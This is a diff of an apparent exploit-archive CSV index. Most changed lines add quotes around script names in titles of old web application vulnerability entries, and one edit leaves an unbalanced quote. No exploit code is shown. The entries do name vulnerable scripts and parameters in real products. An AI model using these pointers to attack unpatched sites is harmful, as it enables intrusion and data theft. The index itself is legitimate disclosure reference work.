26590,platforms/php/webapps/26590.txt,"OvBB 0.x - 'profile.php?userid' SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 26591,platforms/php/webapps/26591.txt,"efiction 1.0/1.1/2.0 - 'titles.php' Cross-Site Scripting",2005-11-25,retrogod@aliceposta.it,php,webapps,0 @@ -29190,15 +29191,15 @@ id,file,description,date,author,platform,type,port 26650,platforms/php/webapps/26650.txt,"Entergal MX 2.0 - Multiple SQL Injections",2005-11-29,r0t,php,webapps,0 26651,platforms/php/webapps/26651.txt,"BosDates 4.0 - Multiple SQL Injections",2005-11-29,r0t,php,webapps,0 26652,platforms/php/webapps/26652.txt,"Post Affiliate Pro 2.0.4 - 'index.php' SQL Injection",2005-11-29,r0t,php,webapps,0 -26653,platforms/php/webapps/26653.txt,"GhostScripter Amazon Shop 5.0 - search.php SQL Injection",2005-11-29,r0t,php,webapps,0 +26653,platforms/php/webapps/26653.txt,"GhostScripter Amazon Shop 5.0 - 'search.php' SQL Injection",2005-11-29,r0t,php,webapps,0 26654,platforms/php/webapps/26654.txt,"KBase Express 1.0 - Multiple SQL Injections",2005-11-29,r0t,php,webapps,0 -26655,platforms/php/webapps/26655.txt,"ltwCalendar 4.1.3 - calendar.php SQL Injection",2005-11-29,r0t,php,webapps,0 +26655,platforms/php/webapps/26655.txt,"ltwCalendar 4.1.3 - 'calendar.php' SQL Injection",2005-11-29,r0t,php,webapps,0 26656,platforms/php/webapps/26656.txt,"Orca KnowledgeBase 2.1 - 'KnowledgeBase.php' SQL Injection",2005-11-29,r0t,php,webapps,0 -26657,platforms/php/webapps/26657.txt,"Orca Blog 1.3 - blog.php SQL Injection",2005-11-29,r0t,php,webapps,0 -26658,platforms/php/webapps/26658.txt,"Orca Ringmaker 2.3 - Ringmaker.php SQL Injection",2005-11-29,r0t,php,webapps,0 +26657,platforms/php/webapps/26657.txt,"Orca Blog 1.3 - 'blog.php' SQL Injection",2005-11-29,r0t,php,webapps,0 +26658,platforms/php/webapps/26658.txt,"Orca Ringmaker 2.3 - 'Ringmaker.php' SQL Injection",2005-11-29,r0t,php,webapps,0 26659,platforms/php/webapps/26659.txt,"FAQ System 1.1 - 'viewFAQ.php' Multiple SQL Injections",2005-11-29,r0t,php,webapps,0 26660,platforms/php/webapps/26660.txt,"FAQ System 1.1 - 'index.php' category_id Parameter SQL Injection",2005-11-29,r0t,php,webapps,0 -26661,platforms/php/webapps/26661.txt,"Survey System 1.1 - survey.php SQL Injection",2005-11-29,r0t,php,webapps,0 +26661,platforms/php/webapps/26661.txt,"Survey System 1.1 - 'survey.php' SQL Injection",2005-11-29,r0t,php,webapps,0 26662,platforms/php/webapps/26662.php,"N-13 News 1.2 - SQL Injection",2005-11-29,KingOfSka,php,webapps,0 26663,platforms/php/webapps/26663.txt,"DRZES Hms 3.2 - Multiple SQL Injections",2005-11-29,r0t,php,webapps,0 26664,platforms/hardware/webapps/26664.txt,"D-Link - OS-Command Injection via UPnP Interface",2013-07-07,m-1-k-3,hardware,webapps,0 @@ -29213,25 +29214,25 @@ id,file,description,date,author,platform,type,port 26675,platforms/php/webapps/26675.txt,"SoftBiz FAQ 1.1 - 'refer_friend.php?id' SQL Injection",2005-11-30,r0t,php,webapps,0 26676,platforms/php/webapps/26676.txt,"SoftBiz FAQ 1.1 - 'print_article.php?id' SQL Injection",2005-11-30,r0t,php,webapps,0 26677,platforms/php/webapps/26677.txt,"SoftBiz FAQ 1.1 - 'add_comment.php?id' SQL Injection",2005-11-30,r0t,php,webapps,0 -26678,platforms/php/webapps/26678.txt,"FAQRing 3.0 - answer.php SQL Injection",2005-11-30,r0t,php,webapps,0 +26678,platforms/php/webapps/26678.txt,"FAQRing 3.0 - 'answer.php' SQL Injection",2005-11-30,r0t,php,webapps,0 26679,platforms/php/webapps/26679.txt,"WSN Knowledge Base 1.2 - 'index.php' Multiple SQL Injections",2005-11-30,r0t,php,webapps,0 26680,platforms/php/webapps/26680.txt,"WSN Knowledge Base 1.2 - 'comments.php?id' SQL Injection",2005-11-30,r0t,php,webapps,0 26681,platforms/php/webapps/26681.txt,"WSN Knowledge Base 1.2 - 'memberlist.php?id' SQL Injection",2005-11-30,r0t,php,webapps,0 26682,platforms/php/webapps/26682.txt,"OpenNetAdmin 13.03.01 - Remote Code Execution",2013-07-07,Mandat0ry,php,webapps,0 -26683,platforms/php/webapps/26683.txt,"O-Kiraku Nikki 1.3 - Nikki.php SQL Injection",2005-11-30,r0t,php,webapps,0 +26683,platforms/php/webapps/26683.txt,"O-Kiraku Nikki 1.3 - 'Nikki.php' SQL Injection",2005-11-30,r0t,php,webapps,0 26684,platforms/php/webapps/26684.txt,"88Scripts Event Calendar 2.0 - 'index.php' SQL Injection",2005-11-30,r0t,php,webapps,0 26685,platforms/php/webapps/26685.txt,"Instant Photo Gallery 1.0 - 'portfolio.php?cat_id' SQL Injection",2005-11-30,r0t,php,webapps,0 26686,platforms/php/webapps/26686.txt,"Instant Photo Gallery 1.0 - 'content.php?cid' SQL Injection",2005-11-30,r0t,php,webapps,0 26687,platforms/php/webapps/26687.txt,"WebCalendar 1.0.1 - Multiple SQL Injections",2005-12-01,lwang,php,webapps,0 26688,platforms/php/webapps/26688.php,"Lore 1.5.4/1.5.6 - 'article.php' SQL Injection",2005-12-01,r0t,php,webapps,0 -26689,platforms/php/webapps/26689.txt,"DotClear 1.2.1/1.2.2 - Session.php SQL Injection",2005-12-01,Siegfried,php,webapps,0 +26689,platforms/php/webapps/26689.txt,"DotClear 1.2.1/1.2.2 - 'Session.php' SQL Injection",2005-12-01,Siegfried,php,webapps,0 26691,platforms/php/webapps/26691.txt,"WebCalendar 1.0.1 - 'Layers_Toggle.php' HTTP Response Splitting",2005-12-01,lwang,php,webapps,0 -26692,platforms/php/webapps/26692.txt,"Extreme Corporate 6.0 - Extremesearch.php Cross-Site Scripting",2005-12-01,r0t,php,webapps,0 +26692,platforms/php/webapps/26692.txt,"Extreme Corporate 6.0 - 'Extremesearch.php' Cross-Site Scripting",2005-12-01,r0t,php,webapps,0 26693,platforms/php/webapps/26693.txt,"Edgewall Software Trac 0.9 Ticket Query Module - SQL Injection",2005-12-01,"David Maciejak",php,webapps,0 26694,platforms/php/webapps/26694.txt,"PHPMyChat 0.14.6 - 'start_page.css.php?medium' Cross-Site Scripting",2005-12-01,"Louis Wang",php,webapps,0 26695,platforms/php/webapps/26695.txt,"PHPMyChat 0.14.6 - 'style.css.php?medium' Cross-Site Scripting",2005-12-01,"Louis Wang",php,webapps,0 26696,platforms/php/webapps/26696.txt,"PHPMyChat 0.14.6 - 'users_popupL.php?From' Cross-Site Scripting",2005-12-01,"Louis Wang",php,webapps,0 -26697,platforms/php/webapps/26697.php,"PHPX 3.5.x - Admin 'login.php' SQL Injection",2005-11-30,rgod,php,webapps,0 +26697,platforms/php/webapps/26697.php,"PHPX 3.5.x - 'Admin 'login.php' SQL Injection",2005-11-30,rgod,php,webapps,0 26698,platforms/php/webapps/26698.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 - 'gallery.php?CatID' SQL Injection",2005-12-02,r0t,php,webapps,0 26699,platforms/php/webapps/26699.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 - 'ViewItem.php?ItemNum' SQL Injection",2005-12-02,r0t,php,webapps,0 26700,platforms/jsp/webapps/26700.txt,"Java Search Engine 0.9.34 - search.jsp Cross-Site Scripting",2005-12-02,r0t,jsp,webapps,0 @@ -29243,7 +29244,7 @@ id,file,description,date,author,platform,type,port 26707,platforms/php/webapps/26707.txt,"Alisveristr E-Commerce Login - Multiple SQL Injections",2005-12-03,B3g0k,php,webapps,0 26713,platforms/php/webapps/26713.txt,"PHPYellowTM 5.33 - 'search_result.php?haystack' SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 26714,platforms/php/webapps/26714.txt,"PHPYellowTM 5.33 - 'print_me.php?ckey' SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 -26715,platforms/php/webapps/26715.txt,"Widget Property 1.1.19 - Property.php SQL Injection",2005-11-05,r0t3d3Vil,php,webapps,0 +26715,platforms/php/webapps/26715.txt,"Widget Property 1.1.19 - 'Property.php' SQL Injection",2005-11-05,r0t3d3Vil,php,webapps,0 26716,platforms/cgi/webapps/26716.txt,"Easy Search System 1.1 - search.cgi Cross-Site Scripting",2005-12-05,r0t,cgi,webapps,0 26717,platforms/php/webapps/26717.txt,"Web4Future eCommerce Enterprise Edition 2.1 - 'view.php' Multiple SQL Injections",2005-12-05,r0t3d3Vil,php,webapps,0 26718,platforms/php/webapps/26718.txt,"Web4Future eCommerce Enterprise Edition 2.1 - 'index.php' Multiple SQL Injections",2005-12-05,r0t3d3Vil,php,webapps,0 @@ -29256,9 +29257,9 @@ id,file,description,date,author,platform,type,port 26725,platforms/php/webapps/26725.txt,"Web4Future eDating Professional 5.0 - 'gift.php?cid' SQL Injection",2005-12-05,r0t,php,webapps,0 26726,platforms/php/webapps/26726.txt,"Web4Future eDating Professional 5.0 - 'articles.php?cat' SQL Injection",2005-12-05,r0t,php,webapps,0 26727,platforms/php/webapps/26727.txt,"Web4Future eDating Professional 5.0 - 'fq.php?cid' SQL Injection",2005-12-05,r0t,php,webapps,0 -26728,platforms/php/webapps/26728.txt,"Web4Future Portal Solutions - Comentarii.php SQL Injection",2005-12-05,r0t,php,webapps,0 -26729,platforms/php/webapps/26729.txt,"Web4Future Affiliate Manager PRO 4.1 - functions.php SQL Injection",2005-12-05,r0t,php,webapps,0 -26730,platforms/php/webapps/26730.txt,"Web4Future Portal Solutions - Arhiva.php Directory Traversal",2005-12-05,r0t,php,webapps,0 +26728,platforms/php/webapps/26728.txt,"Web4Future Portal Solutions - 'Comentarii.php' SQL Injection",2005-12-05,r0t,php,webapps,0 +26729,platforms/php/webapps/26729.txt,"Web4Future Affiliate Manager PRO 4.1 - 'functions.php' SQL Injection",2005-12-05,r0t,php,webapps,0 +26730,platforms/php/webapps/26730.txt,"Web4Future Portal Solutions - 'Arhiva.php' Directory Traversal",2005-12-05,r0t,php,webapps,0 26731,platforms/php/webapps/26731.txt,"Blog System 1.2 - 'index.php' cat Parameter SQL Injection",2005-12-05,r0t3d3Vil,php,webapps,0 26732,platforms/php/webapps/26732.txt,"Edgewall Software Trac 0.7.1/0.8/0.9 Search Module - SQL Injection",2005-12-05,anonymous,php,webapps,0 26734,platforms/php/webapps/26734.txt,"vBulletin Advanced User Tagging Mod - Persistent Cross-Site Scripting",2013-07-10,[]0iZy5,php,webapps,0 @@ -29271,7 +29272,7 @@ id,file,description,date,author,platform,type,port 26745,platforms/asp/webapps/26745.txt,"RWAuction Pro 4.0 - search.asp Cross-Site Scripting",2005-12-06,r0t,asp,webapps,0 26746,platforms/asp/webapps/26746.txt,"A-FAQ 1.0 - 'faqDspItem.asp?faqid' SQL Injection",2005-12-06,r0t,asp,webapps,0 26747,platforms/asp/webapps/26747.txt,"A-FAQ 1.0 - 'faqDsp.asp?catcode' SQL Injection",2005-12-06,r0t,asp,webapps,0 -26748,platforms/php/webapps/26748.txt,"DoceboLms 2.0.x - connector.php Directory Traversal",2005-12-06,rgod,php,webapps,0 +26748,platforms/php/webapps/26748.txt,"DoceboLms 2.0.x - 'connector.php' Directory Traversal",2005-12-06,rgod,php,webapps,0 26750,platforms/php/webapps/26750.txt,"PluggedOut Blog 1.9.x - 'index.php' Multiple SQL Injections",2005-12-06,r0t,php,webapps,0 26751,platforms/php/webapps/26751.txt,"Cars Portal 1.1 - 'index.php' Multiple SQL Injections",2005-12-06,r0t,php,webapps,0 26755,platforms/php/webapps/26755.txt,"Thwboard Beta 2.8 - 'calendar.php?year' SQL Injection",2005-12-07,trueend5,php,webapps,0 @@ -29286,7 +29287,7 @@ id,file,description,date,author,platform,type,port 26765,platforms/cfm/webapps/26765.txt,"Magic Forum Personal - 'view_thread.cfm' Multiple SQL Injections",2005-12-08,r0t,cfm,webapps,0 26766,platforms/cfm/webapps/26766.txt,"CF_Nuke 4.6 - 'index.cfm' Local File Inclusion",2005-12-08,r0t,cfm,webapps,0 26767,platforms/cfm/webapps/26767.txt,"CF_Nuke 4.6 - index.cfm Cross-Site Scripting",2005-12-08,r0t,cfm,webapps,0 -26770,platforms/php/webapps/26770.txt,"MilliScripts 1.4 - register.php Cross-Site Scripting",2005-12-08,"Security Nation",php,webapps,0 +26770,platforms/php/webapps/26770.txt,"MilliScripts 1.4 - 'register.php' Cross-Site Scripting",2005-12-08,"Security Nation",php,webapps,0 26771,platforms/cgi/webapps/26771.txt,"Nortel SSL VPN 4.2.1.6 - Web Interface Input Validation",2005-12-08,"Daniel Fabian",cgi,webapps,0 26772,platforms/cfm/webapps/26772.txt,"Magic Book Professional 2.0 - Book.cfm Cross-Site Scripting",2005-12-12,r0t,cfm,webapps,0 26777,platforms/asp/webapps/26777.txt,"LocazoList Classifieds 1.0 - SearchDB.asp Input Validation",2005-12-12,r0t3d3Vil,asp,webapps,0 @@ -29299,8 +29300,8 @@ id,file,description,date,author,platform,type,port 26785,platforms/php/webapps/26785.txt,"Arab Portal 2.0 - 'Link.php' SQL Injection",2005-12-12,stranger-killer,php,webapps,0 26786,platforms/cgi/webapps/26786.txt,"EveryAuction 1.53 - Auction.pl Cross-Site Scripting",2005-12-13,$um$id,cgi,webapps,0 26787,platforms/php/webapps/26787.txt,"phpCOIN 1.2.2 - CCFG[_PKG_PATH_DBSE] Remote File Inclusion",2005-12-13,retrogod@aliceposta.it,php,webapps,0 -26788,platforms/php/webapps/26788.txt,"PHPCOIN 1.2.2 - 'includes/db.php?$_CCFG[_PKG_PATH_DBSE]' Traversal Arbitrary File Access",2005-12-13,retrogod@aliceposta.it,php,webapps,0 -26789,platforms/php/webapps/26789.txt,"EncapsGallery 1.0 - gallery.php SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 +26788,platforms/php/webapps/26788.txt,"PHPCOIN 1.2.2 - '/includes/db.php?$_CCFG[_PKG_PATH_DBSE]' Traversal Arbitrary File Access",2005-12-13,retrogod@aliceposta.it,php,webapps,0 +26789,platforms/php/webapps/26789.txt,"EncapsGallery 1.0 - 'gallery.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26790,platforms/php/webapps/26790.txt,"PHPWebGallery 1.3.4/1.5.1 - 'comments.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26791,platforms/php/webapps/26791.txt,"PHPWebGallery 1.3.4/1.5.1 - 'category.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26792,platforms/php/webapps/26792.txt,"PHPWebGallery 1.3.4/1.5.1 - 'picture.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 @@ -29309,7 +29310,7 @@ id,file,description,date,author,platform,type,port 26795,platforms/php/webapps/26795.txt,"VCD-db 0.9x - 'search.php?by' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26796,platforms/php/webapps/26796.txt,"VCD-db 0.9x Search Module - batch Parameter Cross-Site Scripting",2005-12-13,r0t3d3Vil,php,webapps,0 26797,platforms/php/webapps/26797.txt,"PHP JackKnife 2.21 - Cross-Site Scripting",2005-12-13,r0t3d3Vil,php,webapps,0 -26798,platforms/php/webapps/26798.txt,"Mantis 0.x/1.0 - View_filters_page.php Cross-Site Scripting",2005-12-13,r0t,php,webapps,0 +26798,platforms/php/webapps/26798.txt,"Mantis 0.x/1.0 - 'View_filters_page.php' Cross-Site Scripting",2005-12-13,r0t,php,webapps,0 26799,platforms/php/webapps/26799.txt,"Snipe Gallery 3.1.4 - 'view.php?gallery_id' SQL Injection",2005-12-13,r0t,php,webapps,0 26800,platforms/php/webapps/26800.txt,"Snipe Gallery 3.1.4 - 'image.php?image_id' SQL Injection",2005-12-13,r0t,php,webapps,0 26801,platforms/php/webapps/26801.txt,"Snipe Gallery 3.1.4 - 'search.php?keyword' Cross-Site Scripting",2005-12-13,r0t,php,webapps,0 @@ -29320,7 +29321,7 @@ id,file,description,date,author,platform,type,port 26808,platforms/php/webapps/26808.txt,"McGallery 1.0/1.1/2.2 - 'index.php' language Parameter Traversal Local File Inclusion",2005-12-13,r0t,php,webapps,0 26809,platforms/php/webapps/26809.txt,"McGallery 1.0/1.1/2.2 - 'show.php' Multiple SQL Injections",2005-12-13,r0t,php,webapps,0 26810,platforms/php/webapps/26810.txt,"McGallery 1.0/1.1/2.2 - 'index.php' album Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 -26812,platforms/php/webapps/26812.txt,"PHP Web Scripts Ad Manager Pro 2.0 - Advertiser_statistic.php SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0 +26812,platforms/php/webapps/26812.txt,"PHP Web Scripts Ad Manager Pro 2.0 - 'Advertiser_statistic.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0 26813,platforms/php/webapps/26813.txt,"Jamit Job Board 2.4.1 - 'index.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0 26814,platforms/php/webapps/26814.txt,"DreamLevels Dream Poll 3.0 - 'View_Results.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0 26815,platforms/php/webapps/26815.txt,"CourseForum Technologies ProjectForum 4.7 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,r0t3d3Vil,php,webapps,0 @@ -29331,7 +29332,7 @@ id,file,description,date,author,platform,type,port 26821,platforms/asp/webapps/26821.txt,"ASPBB 0.4 - 'topic.asp?TID' SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 26822,platforms/asp/webapps/26822.txt,"ASPBB 0.4 - 'forum.asp?FORUM_ID' SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 26823,platforms/asp/webapps/26823.txt,"ASPBB 0.4 - 'profile.asp?PROFILE_ID' SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 -26824,platforms/php/webapps/26824.txt,"WikkaWiki 1.1.6 - TextSearch.php Cross-Site Scripting",2005-12-14,r0t,php,webapps,0 +26824,platforms/php/webapps/26824.txt,"WikkaWiki 1.1.6 - 'TextSearch.php' Cross-Site Scripting",2005-12-14,r0t,php,webapps,0 26826,platforms/php/webapps/26826.txt,"Netref 3.0 - 'index.php' SQL Injection",2005-12-14,syst3m_f4ult,php,webapps,0 26831,platforms/php/webapps/26831.txt,"QuickPayPro 3.1 - 'tracking.details.php?trackingid' SQL Injection",2005-12-14,r0t,php,webapps,0 26832,platforms/php/webapps/26832.txt,"QuickPayPro 3.1 - 'sales.view.php?customerid' SQL Injection",2005-12-14,r0t,php,webapps,0 @@ -29407,7 +29408,7 @@ id,file,description,date,author,platform,type,port 26911,platforms/php/webapps/26911.txt,"Komodo CMS 2.1 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps,0 26912,platforms/php/webapps/26912.txt,"Mercury CMS 4.0 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps,0 26914,platforms/cgi/webapps/26914.txt,"Extensis Portfolio Netpublish Server 7.0 - Server.NP Directory Traversal",2005-12-20,"Andy Davis",cgi,webapps,0 -26916,platforms/php/webapps/26916.txt,"Enterprise Connector 1.0.2 - main.php SQL Injection",2005-12-20,"Attila Gerendi",php,webapps,0 +26916,platforms/php/webapps/26916.txt,"Enterprise Connector 1.0.2 - 'main.php' SQL Injection",2005-12-20,"Attila Gerendi",php,webapps,0 26917,platforms/cgi/webapps/26917.txt,"LiveJournal - Cleanhtml.pl HTML Injection",2005-12-20,"Andrew Farmer",cgi,webapps,0 26918,platforms/php/webapps/26918.txt,"Plogger Beta 2 - Remote File Inclusion",2005-12-20,"Security .Net Information",php,webapps,0 26919,platforms/php/webapps/26919.txt,"AbleDesign D-Man 3.0 - Title Parameter Cross-Site Scripting",2005-12-20,$um$id,php,webapps,0 @@ -29418,14 +29419,14 @@ id,file,description,date,author,platform,type,port 26925,platforms/php/webapps/26925.txt,"Papaya CMS 4.0.4 - Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 26926,platforms/asp/webapps/26926.txt,"PortalApp 3.3/4.0 - 'login.asp' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26927,platforms/asp/webapps/26927.txt,"SiteEnable 3.3 - 'login.asp' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 -26928,platforms/asp/webapps/26928.txt,"IntranetApp 3.3 - 'login.asp' ret_page Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 +26928,platforms/asp/webapps/26928.txt,"IntranetApp 3.3 - 'login.asp?ret_page' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26929,platforms/asp/webapps/26929.txt,"IntranetApp 3.3 - 'content.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t,asp,webapps,0 26930,platforms/asp/webapps/26930.txt,"ProjectApp 3.3 - 'forums.asp?keywords' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26931,platforms/asp/webapps/26931.txt,"ProjectApp 3.3 - 'search_employees.asp?keywords' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26932,platforms/asp/webapps/26932.txt,"ProjectApp 3.3 - 'cat.asp?keywords' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26933,platforms/cgi/webapps/26933.txt,"ProjectApp 3.3 - 'links.asp?keywords' Cross-Site Scripting",2005-12-21,r0t,cgi,webapps,0 26934,platforms/asp/webapps/26934.txt,"ProjectApp 3.3 - 'pmprojects.asp?projectid' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 -26935,platforms/asp/webapps/26935.txt,"ProjectApp 3.3 - 'login.asp' ret_page Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 +26935,platforms/asp/webapps/26935.txt,"ProjectApp 3.3 - 'login.asp?ret_page' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26936,platforms/asp/webapps/26936.txt,"ProjectApp 3.3 - 'default.asp?skin_number' Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26937,platforms/cgi/webapps/26937.txt,"ComputerOil Redakto CMS 3.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-21,r0t3d3Vil,cgi,webapps,0 26938,platforms/php/webapps/26938.txt,"Scoop 1.1 RC1 Search Module - Multiple Cross-Site Scriptings",2005-12-21,r0t3d3Vil,php,webapps,0 @@ -29452,7 +29453,7 @@ id,file,description,date,author,platform,type,port 26961,platforms/php/webapps/26961.txt,"Papoo 2.1.2 - 'print.php' Multiple SQL Injections",2005-12-21,r0t3d3Vil,php,webapps,0 26962,platforms/php/webapps/26962.txt,"PHPSlash 0.8.1 - 'article.php' SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 26963,platforms/asp/webapps/26963.txt,"Quantum Art QP7.Enterprise - 'news_and_events_new.asp?p_news_id' SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 -26964,platforms/asp/webapps/26964.txt,"Quantum Art QP7.Enterprise - 'news.asp' p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 +26964,platforms/asp/webapps/26964.txt,"Quantum Art QP7.Enterprise - 'news.asp?p_news_id' SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 26965,platforms/php/webapps/26965.txt,"MusicBox 2.3 - 'type' SQL Injection",2005-12-22,"Medo HaCKer",php,webapps,0 26968,platforms/php/webapps/26968.txt,"SyntaxCMS - Search Query Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 26969,platforms/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 - Action Parameter Cross-Site Scripting",2005-12-22,r0t3d3Vil,asp,webapps,0 @@ -29487,7 +29488,7 @@ id,file,description,date,author,platform,type,port 27002,platforms/php/webapps/27002.txt,"Jevontech PHPenpals - PersonalID SQL Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27003,platforms/php/webapps/27003.txt,"InTouch 0.5.1 Alpha - User Variable SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27004,platforms/php/webapps/27004.txt,"PHPJournaler 1.0 - 'Readold' SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 -27633,platforms/php/webapps/27633.txt,"MyBB 1.10 - member.php Cross-Site Scripting",2006-04-12,o.y.6,php,webapps,0 +27633,platforms/php/webapps/27633.txt,"MyBB 1.10 - 'member.php' Cross-Site Scripting",2006-04-12,o.y.6,php,webapps,0 27005,platforms/hardware/webapps/27005.txt,"Barracuda LB / SVF / WAF / WEF - Multiple Vulnerabilities",2013-07-22,Vulnerability-Lab,hardware,webapps,0 27006,platforms/hardware/webapps/27006.txt,"Barracuda CudaTel 2.6.02.040 - SQL Injection",2013-07-22,Vulnerability-Lab,hardware,webapps,0 27439,platforms/php/webapps/27439.txt,"Invision Power Services Invision Board 2.0.4 - Print Action t Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 @@ -29506,9 +29507,9 @@ id,file,description,date,author,platform,type,port 27022,platforms/php/webapps/27022.txt,"INCOGEN Bugport 1.x - Multiple SQL Injections",2006-01-03,r0t,php,webapps,0 27023,platforms/php/webapps/27023.txt,"INCOGEN Bugport 1.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-01-03,r0t,php,webapps,0 27025,platforms/php/webapps/27025.txt,"Primo Place Primo Cart 1.0 - Multiple SQL Injections",2006-01-03,r0t,php,webapps,0 -27027,platforms/php/webapps/27027.txt,"Jax Calendar 1.34 - jax_calendar.php SQL Injection",2005-12-26,r0t3d3Vil,php,webapps,0 +27027,platforms/php/webapps/27027.txt,"Jax Calendar 1.34 - 'jax_calendar.php' SQL Injection",2005-12-26,r0t3d3Vil,php,webapps,0 27028,platforms/php/webapps/27028.txt,"LogicBill 1.0 - Multiple SQL Injections",2005-12-25,r0t3d3Vil,php,webapps,0 -27029,platforms/php/webapps/27029.txt,"EZ Invoice Inc. EZI 2.0 - Invoices.php SQL Injection",2005-12-25,r0t3d3Vil,php,webapps,0 +27029,platforms/php/webapps/27029.txt,"EZ Invoice Inc. EZI 2.0 - 'Invoices.php' SQL Injection",2005-12-25,r0t3d3Vil,php,webapps,0 27030,platforms/php/webapps/27030.txt,"CS-Cart - Multiple SQL Injections",2005-12-25,r0t3d3Vil,php,webapps,0 27033,platforms/php/webapps/27033.txt,"Foro Domus 2.10 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 27034,platforms/asp/webapps/27034.txt,"OnePlug CMS - '/press/details.asp?Press_Release_ID' SQL Injection",2006-01-06,Preddy,asp,webapps,0 @@ -29541,21 +29542,21 @@ id,file,description,date,author,platform,type,port 27075,platforms/php/webapps/27075.txt,"TankLogger 2.4 General Functions Script - SQL Injection",2006-01-12,"Aliaksandr Hartsuyeu",php,webapps,0 27076,platforms/hardware/webapps/27076.txt,"FOSCAM IP-Cameras - Improper Access Restrictions",2013-07-24,"Core Security",hardware,webapps,80 27077,platforms/php/webapps/27077.txt,"DCP Portal 5.3/6.0/6.1 - Multiple Input Validation Vulnerabilities",2006-01-13,night_warrior771,php,webapps,0 -27078,platforms/php/webapps/27078.txt,"Alstrasoft Template Seller Pro 3.25 - Fullview.php Cross-Site Scripting",2006-01-13,night_warrior771,php,webapps,0 +27078,platforms/php/webapps/27078.txt,"Alstrasoft Template Seller Pro 3.25 - 'Fullview.php' Cross-Site Scripting",2006-01-13,night_warrior771,php,webapps,0 27079,platforms/asp/webapps/27079.txt,"Web Host Automation Ltd. Helm 3.2.8 - ForgotPassword.asp Cross-Site Scripting",2006-01-13,"M.Neset KABAKLI",asp,webapps,0 27080,platforms/php/webapps/27080.txt,"EZDatabaseRemote 2.0 - PHP Script Code Execution",2006-01-14,r0t3d3Vil,php,webapps,0 27081,platforms/cgi/webapps/27081.txt,"Ultimate Auction 3.67 - Item.pl Cross-Site Scripting",2006-01-14,querkopf,cgi,webapps,0 27083,platforms/asp/webapps/27083.txt,"SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities",2006-01-16,Zinho,asp,webapps,0 27084,platforms/php/webapps/27084.txt,"Bit 5 Blog 8.1 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 27085,platforms/php/webapps/27085.txt,"Bit 5 Blog 8.1 - addcomment.php HTML Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 -27086,platforms/php/webapps/27086.txt,"White Album 2.5 - Pictures.php SQL Injection",2006-01-16,liz0,php,webapps,0 -27087,platforms/php/webapps/27087.txt,"GeoBlog 1.0 - viewcat.php SQL Injection",2005-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 +27086,platforms/php/webapps/27086.txt,"White Album 2.5 - 'Pictures.php' SQL Injection",2006-01-16,liz0,php,webapps,0 +27087,platforms/php/webapps/27087.txt,"GeoBlog 1.0 - 'viewcat.php' SQL Injection",2005-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 27088,platforms/cgi/webapps/27088.txt,"Faq-O-Matic 2.711 - Multiple Cross-Site Scripting Vulnerabilities",2006-01-16,Preddy,cgi,webapps,0 27091,platforms/cgi/webapps/27091.txt,"Ultimate Auction 3.67 - ItemList.pl Cross-Site Scripting",2006-01-16,querkopf,cgi,webapps,0 27092,platforms/php/webapps/27092.txt,"GTP iCommerce - Multiple Cross-Site Scripting Vulnerabilities",2006-01-16,Preddy,php,webapps,0 27093,platforms/php/webapps/27093.txt,"EZDatabase 2.1.1 - 'index.php' Cross-Site Scripting",2006-01-16,"Josh Zlatin-Amishav",php,webapps,0 -27097,platforms/php/webapps/27097.txt,"PHPXplorer 0.9.33 - Workspaces.php Directory Traversal",2006-01-16,"Oriol Torrent Santiago",php,webapps,0 